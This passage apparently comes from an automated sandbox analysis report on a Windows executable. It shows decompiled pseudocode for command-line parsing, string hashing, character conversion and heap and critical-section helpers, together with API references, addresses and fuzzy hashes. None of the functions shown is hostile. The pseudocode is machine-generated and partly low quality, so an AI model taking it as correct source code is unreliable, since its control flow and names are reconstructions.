				do {
					if(_t24 != _v8) {
						L5:
						_t25 =  *_t11 & 0x0000ffff;
						_a4 = 1;
						if(_t25 != _v4) {
							if(_t25 == 0) {
								_t26 = 0;
								L25:
								if(_v0 != _t15 || _t31 == 0) {
									goto L27;
								} else {
									if(_t32 == 0) {
										goto L34;
									}
									 *_t31 = _t17 - _t32 >> 1;
									_v0 =  &(_v0[0]);
									return _t32;
								}
							}
							_t32 = _t11;
							_t21 = 0x20;
							while(_t25 != _t21) {
								_t11 =  &(_t11[1]);
								_t28 = 0x22;
								if( *_t11 != _t28) {
									L20:
									_t25 =  *_t11 & 0x0000ffff;
									if(_t25 != 0) {
										continue;
									}
									break;
								}
								_t11 =  &(_t11[1]);
								_t23 =  *_t11 & 0x0000ffff;
								if(_t23 == 0) {
									L22:
									_t17 = _t11;
									L23:
									_t26 = _a4;
									goto L25;
								}
								while(_t23 != _t28) {
									_t11 =  &(_t11[1]);
									_t23 =  *_t11 & 0x0000ffff;
									if(_t23 != 0) {
										continue;
									}
									break;
								}
								_t21 = 0x20;
								goto L20;
							}
							L10:
							if( *_t11 == 0) {
								goto L22;
							}
							_t17 = _t11;
							_t11 =  &(_t11[1]);
							goto L23;
						}
						_t11 =  &(_t11[1]);
						_t32 = _t11;
						_t18 =  *_t11 & 0x0000ffff;
						if(_t18 == 0) {
							goto L22;
						}
						_t29 = 0x22;
						while(_t18 != _t29) {
							_t11 =  &(_t11[1]);
							_t18 =  *_t11 & 0x0000ffff;
							if(_t18 != 0) {
								continue;
							}
							goto L10;
						}
						goto L10;
					}
					_t30 = 0x20;
					do {
						_t11 =  &(_t11[1]);
					} while ( *_t11 == _t30);
					goto L5;
					L27:
					if(_t26 != 0) {
						_t15 = _t15 + 1;
					}
					_t32 = 0;
					_t24 =  *_t11 & 0x0000ffff;
				} while (_t24 != 0);
				goto L30;
			}

0x004096e6
0x004096ed
0x004096f2
0x004096f4
0x004096fa
0x004096fe
0x00409704
0x004097da
0x004097dc
0x004097f3
0x004097f5
0x00000000
0x004097f5
0x00000000
0x004097de
0x0040970a
0x0040970e
0x00409716
0x0040971e
0x00409723
0x00409730
0x00409730
0x00409733
0x00409740
0x00409773
0x004097ba
0x004097bc
0x004097bf
0x00000000
0x004097e2
0x004097e4
0x00000000
0x00000000
0x004097ec
0x004097ee
0x00000000
0x004097ee
0x004097bf
0x00409777
0x00409779
0x0040977a
0x0040977f
0x00409784
0x00409788
0x004097a8
0x004097a8
0x004097ae
0x00000000
0x00000000
0x00000000
0x004097b0
0x0040978a
0x0040978d
0x00409793
0x004097b2
0x004097b2
0x004097b4
0x004097b4
0x00000000
0x004097b4
0x00409795
0x0040979a
0x0040979d
0x004097a3
0x00000000
0x00000000
0x00000000
0x004097a3
0x004097a7
0x00000000
0x004097a7
0x00409762
0x00409767
0x00000000
0x00000000
0x00409769
0x0040976b
0x00000000
0x0040976b
0x00409742
0x00409745
0x00409747
0x0040974d
0x00000000
0x00000000
0x00409751
0x00409752
0x00409757
0x0040975a
0x00409760
0x00000000
0x00000000
0x00000000
0x00409760
0x00000000
0x00409752
0x00409727
0x00409728
0x00409728
0x0040972b
0x00000000
0x004097c5
0x004097c7
0x004097c9
0x004097c9
0x004097cc
0x004097ce
0x004097d1
0x00000000

APIs

Part of subcall function 0040D288: TlsGetValue.KERNEL32(?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D28F
Part of subcall function 0040D288: HeapAlloc.KERNEL32(00000008,?,?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D2AA
Part of subcall function 0040D288: TlsSetValue.KERNEL32(00000000,?,?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D2B9

GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409810,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 004096F4

Strings

", xrefs: 00409716
, xrefs: 0040970E

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$AllocCommandHeapLine
String ID: $"
API String ID: 1339485270-3817095088
Opcode ID: f97b4f0fc6cdbdc4f126a07b0d6f143b00e44276b0d28f9304cf3883811f345f
Instruction ID: 4c648ba0253d95f00ea60fdf00931512a06ba22242bcbe44c620df30a2d3858e
Opcode Fuzzy Hash: f97b4f0fc6cdbdc4f126a07b0d6f143b00e44276b0d28f9304cf3883811f345f
Instruction Fuzzy Hash: 6031A473525221CADB749F24981137772A1EBB1B60F18817FE8926B3C2F37D8D419359

Uniqueness

Uniqueness Score: -1.00%

Function 00409F58, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00409F58(intOrPtr* _a4, wchar_t* _a8) {
				signed int _t36;
				intOrPtr _t38;
				wchar_t* _t39;
				intOrPtr* _t50;
				intOrPtr* _t51;
				signed int _t52;

				_t39 = _a8;
				if(_t39 == 0) {
					_t39 = 0x412024;
				}
				_t51 = _a4;
				_push(_t39);
				if(( *(_t51 + 0x2c) & 0x00000001) == 0) {
					_t52 = E0040A24F() %  *(_t51 + 0x24);
					_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)) + _t52 * 4));
					while(_t50 != 0) {
						if(wcscmp( *(_t50 + 4), _t39) == 0) {
							goto L8;
						}
						 *((intOrPtr*)(_t51 + 8)) = _t50;
						_t50 =  *_t50;
					}
					goto L13;
				} else {
					_t36 = E0040A26A();
					_t38 =  *((intOrPtr*)(_t51 + 4));
					_t52 = _t36 %  *(_t51 + 0x24);
					_t50 =  *((intOrPtr*)(_t38 + _t52 * 4));
					while(_t50 != 0) {
						_push(_t39);
						_push( *(_t50 + 4));
						L0040531F();
						if(_t38 == 0) {
							L8:
							 *(_t51 + 0x14) = _t52;
							 *_t51 = _t50;
							return _t50 + 8;
						}
						 *((intOrPtr*)(_t51 + 8)) = _t50;
						_t50 =  *_t50;
					}
					L13:
					return 0;
				}
			}

0x00409f59
0x00409f62
0x00409f64
0x00409f64
0x00409f69
0x00409f6d
0x00409f72
0x00409fba
0x00409fbd
0x00409fd6
0x00409fcf
0x00000000
0x00000000
0x00409fd1
0x00409fd4
0x00409fd4
0x00000000
0x00409f74
0x00409f74
0x00409f7e
0x00409f81
0x00409f84
0x00409f9d
0x00409f89
0x00409f8a
0x00409f8d
0x00409f96
0x00409fa3
0x00409fa3
0x00409fa9
0x00000000
0x00409fa9
0x00409f98
0x00409f9b
0x00409f9b
0x00409fda
0x00000000
0x00409fda

APIs

_wcsicmp.MSVCRT ref: 00409F8D
wcscmp.MSVCRT ref: 00409FC6

Strings

$ A, xrefs: 00409F64

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmpwcscmp
String ID: $ A
API String ID: 3419221977-1415209610
Opcode ID: f21810243c52a83e43149c8ba45ed39ee43fe6731525ce4266dde6b58930fcab
Instruction ID: a733317a4b81313ba419c318017c22e6bf29b3e2c3e1e122568c9b8a7727cdd0
Opcode Fuzzy Hash: f21810243c52a83e43149c8ba45ed39ee43fe6731525ce4266dde6b58930fcab
Instruction Fuzzy Hash: 1111BFB2108B028FD3209F16D440923B3E9EFC8360324843FE849A3792DB79FC118A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405700, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405700(short* _a4) {
				char* _t6;
				short* _t7;
				int _t8;

				_t7 = _a4;
				if(_t7 == 0) {
					_t7 = 0x412024;
				}
				_t8 = WideCharToMultiByte(0xfde9, 0, _t7, 0xffffffff, 0, 0, 0, 0);
				_t6 = E00409B40(_t8);
				if(_t6 != 0) {
					WideCharToMultiByte(0xfde9, 0, _t7, 0xffffffff, _t6, _t8, 0, 0);
				}
				return _t6;
			}

0x00405702
0x00405709
0x0040570b
0x0040570b
0x00405728
0x00405730
0x00405734
0x00405746
0x00405746
0x00405751

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746

Strings

$ A, xrefs: 0040570B

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: $ A
API String ID: 626452242-1415209610
Opcode ID: ca72461ec9b0f3d02c9927fa16f8ee0024e96a70de694c605e1f9d49a19121eb
Instruction ID: 51e3e9442c1b14bfca279b8410f0cbc31bbd530ab1d9b24216a3048053e00ad1
Opcode Fuzzy Hash: ca72461ec9b0f3d02c9927fa16f8ee0024e96a70de694c605e1f9d49a19121eb
Instruction Fuzzy Hash: FFF0303638522176E231215A5C06F576A59C785F70F264236BB24BF2C585A1680059AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040D51F, Relevance: 5.1, APIs: 4, Instructions: 134
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D51F(char _a4) {
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t78;
				signed int _t81;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr _t85;
				long _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;

				_t88 = _a4;
				_t87 = 0;
				_t91 = 0;
				if( *((intOrPtr*)(_t88 + 0x1c)) != 0) {
					EnterCriticalSection(_t88 + 0x20);
					_t87 = 0;
				}
				_t89 =  *((intOrPtr*)(_t88 + 4));
				if(_t89 == 0) {
					_t78 =  *(_t88 + 0xc) >> 0x00000004 & 0xfffffff0;
					if(_t78 >=  *(_t88 + 0x14)) {
						if(_t78 >  *(_t88 + 0x18)) {
							_t78 =  *(_t88 + 0x18);
						}
					} else {
						_t78 =  *(_t88 + 0x14);
					}
					_t90 = HeapAlloc( *0x417008, _t87,  *(_t88 + 0x10) * _t78 + 0x18);
					_t81 = 1;
					if(_t90 == 0) {
						_t90 = HeapAlloc( *0x417008, 0,  *(_t88 + 0x10) + 0x18);
						if(_t90 == 0) {
							_t87 = 0;
							goto L30;
						}
						_t81 = 1;
						 *(_t90 + 0xc) = 1;
						goto L23;
					} else {
						 *(_t90 + 0xc) = _t78;
						L23:
						_t87 = 0;
						 *(_t88 + 0xc) =  *(_t88 + 0xc) +  *(_t90 + 0xc);
						 *((intOrPtr*)(_t90 + 0x10)) = _t81;
						 *((intOrPtr*)(_t90 + 0x14)) = 0;
						 *((intOrPtr*)(_t90 + 8)) = 0;
						if( *(_t90 + 0xc) <= _t81) {
							 *_t90 =  *_t88;
							 *((intOrPtr*)(_t90 + 4)) = 0;
							 *_t88 = _t90;
						} else {
							 *_t90 =  *((intOrPtr*)(_t88 + 4));
							 *((intOrPtr*)(_t90 + 4)) = 0;
							 *((intOrPtr*)(_t88 + 4)) = _t90;
						}
						_t62 =  *_t90;
						if(_t62 != 0) {
							 *((intOrPtr*)(_t62 + 4)) = _t90;
						}
						_t46 = _t90 + 0x18; // 0x18
						_t91 = _t46;
						L30:
						goto L31;
					}
				} else {
					_t83 =  *((intOrPtr*)(_t89 + 0x14));
					if(_t83 <= 0) {
						_t84 =  *(_t89 + 0x10);
						_t91 = _t89 + 0x18 +  *(_t88 + 0x10) * _t84;
						_t13 = _t84 + 1; // 0x1
						 *(_t89 + 0x10) = _t13;
					} else {
						_t91 =  *((intOrPtr*)(_t89 + 8));
						 *((intOrPtr*)(_t89 + 8)) =  *_t91;
						_t8 = _t83 - 1; // -1
						 *((intOrPtr*)(_t89 + 0x14)) = _t8;
					}
					if( *((intOrPtr*)(_t89 + 0x14)) == _t87 &&  *(_t89 + 0x10) >=  *((intOrPtr*)(_t89 + 0xc))) {
						_t85 =  *_t89;
						if(_t85 != 0) {
							 *(_t85 + 4) =  *(_t89 + 4);
						}
						_t68 =  *_t89;
						if(_t89 !=  *((intOrPtr*)(_t88 + 4))) {
							 *( *(_t89 + 4)) = _t68;
						} else {
							 *((intOrPtr*)(_t88 + 4)) = _t68;
						}
						 *_t89 =  *_t88;
						 *(_t89 + 4) = _t87;
						 *_t88 = _t89;
						_t70 =  *_t89;
						if(_t70 != 0) {
							 *((intOrPtr*)(_t70 + 4)) = _t89;
						}
					}
					L31:
					if( *((intOrPtr*)(_t88 + 0x1c)) != _t87) {
						LeaveCriticalSection(_t88 + 0x20);
					}
					if(_t91 == 0) {
						return 0;
					} else {
						 *_t91 = _t90;
						_t49 =  &_a4; // 0x4
						return _t49;
					}
				}
			}

0x0040d522
0x0040d526
0x0040d528
0x0040d52d
0x0040d533
0x0040d539
0x0040d539
0x0040d53b
0x0040d540
0x0040d5c2
0x0040d5c8
0x0040d5d2
0x0040d5d4
0x0040d5d4
0x0040d5ca
0x0040d5ca
0x0040d5ca
0x0040d5f0
0x0040d5f2
0x0040d5f5
0x0040d611
0x0040d615
0x0040d657
0x00000000
0x0040d657
0x0040d619
0x0040d61a
0x00000000
0x0040d5f7
0x0040d5f7
0x0040d61d
0x0040d620
0x0040d622
0x0040d625
0x0040d628
0x0040d62b
0x0040d631
0x0040d642
0x0040d644
0x0040d647
0x0040d633
0x0040d636
0x0040d638
0x0040d63b
0x0040d63b
0x0040d649
0x0040d64d
0x0040d64f
0x0040d64f
0x0040d652
0x0040d652
0x0040d659
0x00000000
0x0040d659
0x0040d542
0x0040d542
0x0040d547
0x0040d55a
0x0040d566
0x0040d568
0x0040d56b
0x0040d549
0x0040d549
0x0040d54f
0x0040d552
0x0040d555
0x0040d555
0x0040d571
0x0040d583
0x0040d587
0x0040d58c
0x0040d58c
0x0040d58f
0x0040d594
0x0040d59e
0x0040d596
0x0040d596
0x0040d596
0x0040d5a2
0x0040d5a4
0x0040d5a7
0x0040d5a9
0x0040d5ad
0x0040d5b3
0x0040d5b3
0x0040d5ad
0x0040d65a
0x0040d65d
0x0040d663
0x0040d663
0x0040d66b
0x00000000
0x0040d66d
0x0040d66d
0x0040d670
0x00000000
0x0040d670
0x0040d66b

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?), ref: 0040D533
HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?), ref: 0040D5E8
HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000), ref: 0040D60B
LeaveCriticalSection.KERNEL32(?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?,?), ref: 0040D663

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
Instruction ID: c75203acf5dbc6b13cd53f4330a4279d02754d6c9a51f963ab4d277c9f4d2c3e
Opcode Fuzzy Hash: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
Instruction Fuzzy Hash: 67510570900B02AFC324CF69D980922B7F4FF587147108A3EE8AA97A94D335F959CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0D0, Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E0D0(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t40;
				void* _t43;
				void* _t45;

				_v8 = 0;
				if(_a8 == 0) {
					if( *_a4 != 0) {
						_t40 =  *0x417720; // 0x2790000
						HeapFree(_t40, 0,  *_a4);
						 *_a4 = 0;
					}
				} else {
					_v8 = wcslen(_a8);
					if( *_a4 != 0) {
						_t12 = _v8 + 0xa; // 0xa
						_t43 =  *0x417720; // 0x2790000
						 *_a4 = HeapReAlloc(_t43, 0,  *_a4, _v8 + _t12);
					} else {
						_t8 = _v8 + 0xa; // 0xa
						_t45 =  *0x417720; // 0x2790000
						 *_a4 = HeapAlloc(_t45, 0, _v8 + _t8);
					}
					E0040E300(_a8,  *_a4, _a8, _v8);
				}
				return _v8 + _v8 + 2;
			}

0x0040e0d4
0x0040e0df
0x0040e153
0x0040e15d
0x0040e164
0x0040e16d
0x0040e16d
0x0040e0e1
0x0040e0ed
0x0040e0f6
0x0040e119
0x0040e126
0x0040e136
0x0040e0f8
0x0040e0fb
0x0040e102
0x0040e112
0x0040e112
0x0040e146
0x0040e146
0x0040e17d

APIs

wcslen.MSVCRT ref: 0040E0E5
HeapAlloc.KERNEL32(02790000,00000000,0000000A), ref: 0040E109
HeapReAlloc.KERNEL32(02790000,00000000,00000000,0000000A), ref: 0040E12D
HeapFree.KERNEL32(02790000,00000000,00000000,?,?,0040506F,?,0041602A,00401095,00000000), ref: 0040E164

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Alloc$Freewcslen
String ID:
API String ID: 2479713791-0
Opcode ID: f5b77000bbf8e4bbffd1e92e25ea49c26a95bf6dea2a94c690576bfd34a48491
Instruction ID: 5c25edb19946727406606906c76980e1d10e687976c030b77a126e3da493f9c6
Opcode Fuzzy Hash: f5b77000bbf8e4bbffd1e92e25ea49c26a95bf6dea2a94c690576bfd34a48491
Instruction Fuzzy Hash: BD212774604209EFDB04CF94D884FAAB7BAFB48354F108569F9099F390D735EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D438, Relevance: 5.1, APIs: 4, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040D438(long* _a4, signed int _a8) {
				long _t24;
				signed int _t27;
				struct _CRITICAL_SECTION* _t34;
				signed int _t38;
				long* _t39;
				intOrPtr _t40;

				_t39 = _a4;
				_t2 =  &(_t39[8]); // 0x20
				_t34 = _t2;
				EnterCriticalSection(_t34);
				_t38 = _a8;
				if(_t38 != 0xffffffff) {
					if(_t38 >= _t39[2]) {
						_t27 = _t39[1] + _t38;
						_t39[2] = _t27;
						_t39[3] = HeapReAlloc( *0x417008, 8, _t39[3], _t27 << 2);
					}
					if( *((intOrPtr*)(_t39[3] + _t38 * 4)) == 0) {
						 *((intOrPtr*)(_t39[3] + _t38 * 4)) = HeapAlloc( *0x417008, 8,  *_t39);
					} else {
						_t24 = _t39[5];
						if(_t24 != 0) {
							 *_t24(_t38);
						}
					}
					_t40 =  *((intOrPtr*)(_t39[3] + _t38 * 4));
				} else {
					_t4 =  &(_t39[4]); // 0x10
					_t40 = E0040DB12(_t4,  *_t39 + 8);
				}
				LeaveCriticalSection(_t34);
				return _t40;
			}

0x0040d43a
0x0040d43f
0x0040d43f
0x0040d443
0x0040d449
0x0040d450
0x0040d46a
0x0040d46f
0x0040d471
0x0040d489
0x0040d489
0x0040d493
0x0040d4b4
0x0040d495
0x0040d495
0x0040d49a
0x0040d49d
0x0040d49d
0x0040d49a
0x0040d4ba
0x0040d452
0x0040d458
0x0040d463
0x0040d463
0x0040d4be
0x0040d4c9

APIs

EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D483
LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE

Part of subcall function 0040DB12: HeapAlloc.KERNEL32(00000008,00000000,0040D38C,00417608,00000014,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB1E

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
Instruction ID: a304a92e3806a45bcf6d327fe86cdfb5e6d5534298f9acb62e815e22c79c963c
Opcode Fuzzy Hash: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
Instruction Fuzzy Hash: 30112B32604700AFC3208FA8EC40D56B7FAFF58765B15892AE996E36A0C734F804CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040D67D, Relevance: 5.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D67D(void** _a4) {
				void* _t9;
				void* _t10;
				struct _CRITICAL_SECTION* _t11;
				void** _t15;
				void* _t16;
				void* _t17;

				_t15 = _a4;
				if(_t15[7] != 0) {
					_t3 =  &(_t15[8]); // 0x20
					EnterCriticalSection(_t3);
				}
				_t9 = _t15[1];
				if(_t9 != 0) {
					do {
						_t17 =  *_t9;
						HeapFree( *0x417008, 0, _t9);
						_t9 = _t17;
					} while (_t17 != 0);
				}
				_t10 =  *_t15;
				if(_t10 != 0) {
					do {
						_t16 =  *_t10;
						HeapFree( *0x417008, 0, _t10);
						_t10 = _t16;
					} while (_t16 != 0);
				}
				 *_t15 = 0;
				_t15[1] = 0;
				_t15[3] = 0;
				if(_t15[7] != 0) {
					_t8 =  &(_t15[8]); // 0x20
					_t11 = _t8;
					LeaveCriticalSection(_t11);
					return _t11;
				}
				return _t10;
			}

0x0040d680
0x0040d689
0x0040d68b
0x0040d68f
0x0040d68f
0x0040d695
0x0040d69a
0x0040d69c
0x0040d69c
0x0040d6a6
0x0040d6ac
0x0040d6ae
0x0040d69c
0x0040d6b2
0x0040d6b6
0x0040d6b8
0x0040d6b8
0x0040d6c2
0x0040d6c8
0x0040d6ca
0x0040d6b8
0x0040d6ce
0x0040d6d0
0x0040d6d3
0x0040d6d9
0x0040d6db
0x0040d6db
0x0040d6df
0x00000000
0x0040d6df
0x0040d6e8

APIs

EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D68F
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F), ref: 0040D6A6
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F), ref: 0040D6C2
LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D6DF

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
Instruction ID: ccb09d183470463af25dc63fc94d1cebb037c249e32c06969674a21ae1653042
Opcode Fuzzy Hash: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
Instruction Fuzzy Hash: BF017C75A0261AEFC7108F95E904967BBBCFF08750301843AE80897654C731E864CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 00409E6F, Relevance: 5.0, APIs: 4, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409E6F(void* _a4) {
				void* __ebp;
				void* _t7;
				void* _t12;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t24;

				_t20 = _a4;
				_t27 = _t20;
				if(_t20 != 0) {
					_push(_t24);
					E0040A0BA(_t19, _t27, _t20);
					E0040D8E6(_t24,  *((intOrPtr*)(_t20 + 0x38)));
					HeapFree( *0x417008, 0,  *(_t20 + 4));
					HeapFree( *0x417008, 0,  *(_t20 + 0xc));
					_t12 =  *(_t20 + 0x34);
					if(_t12 == 0) {
						L5:
						 *((intOrPtr*)( *((intOrPtr*)(_t20 + 0x30)))) = 0;
						return HeapFree( *0x417008, 0, _t20);
					}
					do {
						_t22 =  *_t12;
						HeapFree( *0x417008, 0, _t12);
						_t12 = _t22;
					} while (_t22 != 0);
					goto L5;
				}
				return _t7;
			}

0x00409e70
0x00409e74
0x00409e76
0x00409e79
0x00409e7b
0x00409e83
0x00409e9a
0x00409ea6
0x00409ea8
0x00409ead
0x00409ec3
0x00409ec8
0x00000000
0x00409ed3
0x00409eb0
0x00409eb0
0x00409eba
0x00409ebc
0x00409ebe
0x00000000
0x00409ec2
0x00409ed5

APIs

Part of subcall function 0040A0BA: memset.MSVCRT ref: 0040A122

Part of subcall function 0040D8E6: EnterCriticalSection.KERNEL32(0041761C,00000200,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D8FA
Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004), ref: 0040D948
Part of subcall function 0040D8E6: LeaveCriticalSection.KERNEL32(0041761C,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D94F

HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409E9A
HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
Instruction ID: bfb960cb52ae9f1737c5edf5dab89cb24d0a80b98fb865d44a1203debf2c4dae
Opcode Fuzzy Hash: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
Instruction Fuzzy Hash: 40F0FF31205609BFC6126F5AED40D57BF7DFF5A7983464136B404626B0C732EC619AA8

Uniqueness

